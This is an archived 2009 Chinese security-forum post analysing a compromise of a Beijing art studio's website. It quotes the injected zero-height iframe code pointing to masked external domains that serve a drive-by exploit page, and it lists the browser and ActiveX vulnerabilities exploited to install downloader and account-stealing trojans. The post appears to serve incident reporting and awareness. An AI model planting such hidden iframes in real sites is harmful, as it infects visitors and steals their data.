【3.A.S.T】网络安全爱好者's Archiver

黑客学习

可乐猫 发表于 2009-2-16 13:53

北京英展画室网站挂马事件

02月13日,北京英展画室 ([font=Tahoma][size=3]www.bj[/size][/font]****.com.cn)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。

[font=宋体]该网站问题代码:[/font]
[font=宋体][img]http://210.74.145.228/attachment/125_96365_3f0eb0855c3758d.jpg[/img][/font]
[font=宋体]<iframe src=http://www.ab****.cn/b3.htm width=50 height=0 border=0></iframe>[/font][font=宋体]
[font=宋体]http://www.ab****.cn/b3.htm[/font][font=宋体]问题框架代码:[/font][/font]
[font=宋体][font=宋体][img]http://210.74.145.228/attachment/125_96365_b310a169ec8b74f.jpg[/img][/font][/font]
[font=宋体][font=宋体][font=宋体]<iframe src=http://www.lj****.cn/a8/fxx.htm width=100 height=0></Iframe> [font=Tahoma][/font][/font][/font][/font]
[font=宋体][font=宋体][font=宋体]
[/font][font=宋体]http://www.lj****.cn/a8/fxx.htm[/font][font=宋体]网马代码:[/font][/font][/font]
[font=宋体][font=宋体][font=宋体][img]http://210.74.145.228/attachment/125_96365_8a699d3e224d44a.jpg[/img][/font][/font][/font]
[font=宋体][font=宋体][font=宋体][font=宋体][font=宋体][font=arial]该网马利用以下漏洞来传播[/font]:[/font][/font]
[font=宋体][font=宋体][font=arial]MS06014[/font][font=arial]漏洞[/font][/font][/font]
[font=宋体][font=宋体]
[/font][/font][font=宋体][font=宋体]
[font=arial]微软IE7 0day漏洞[/font][/font][/font]
[font=宋体][font=宋体]
[/font][/font]
[font=宋体][font=宋体]
Adobe Flash Player SWF文件漏洞[/font][/font]
[font=宋体]
[/font][font=宋体][font=宋体]
[font=arial]UUSee[/font][font=arial]网络电视2008 UUUpgrade ActiveX Exploit [font=Tahoma][/font][/font][/font][/font]
[font=宋体][font=宋体][font=arial][font=Tahoma][/font][/font][/font][/font][font=宋体][font=宋体]
[font=arial]联众世界游戏GLCHAT.GLChatCtrl.1 ActiveX控件[/font]漏洞[/font][/font]
[font=宋体]
[/font][font=宋体][font=宋体][font=Tahoma][/font]
暴风影音播放器MPS.StormPlayer漏洞
[/font][/font]
[font=宋体][font=宋体]RealPlayer播放器IERPCtl.IERPCtl.1漏洞[/font][/font]
[font=宋体]
[/font]
[font=宋体][font=宋体]以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。
注: [font=Tahoma][/font][/font][/font]
[font=宋体][font=宋体][font=Tahoma][/font]
    被挂马的地址是:[font=Tahoma][size=3][color=#000000]www.bj[/color][/size][/font]****.com.cn[/font][/font][/font][/font][/font]

柔肠寸断 发表于 2009-2-17 15:05

AD

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.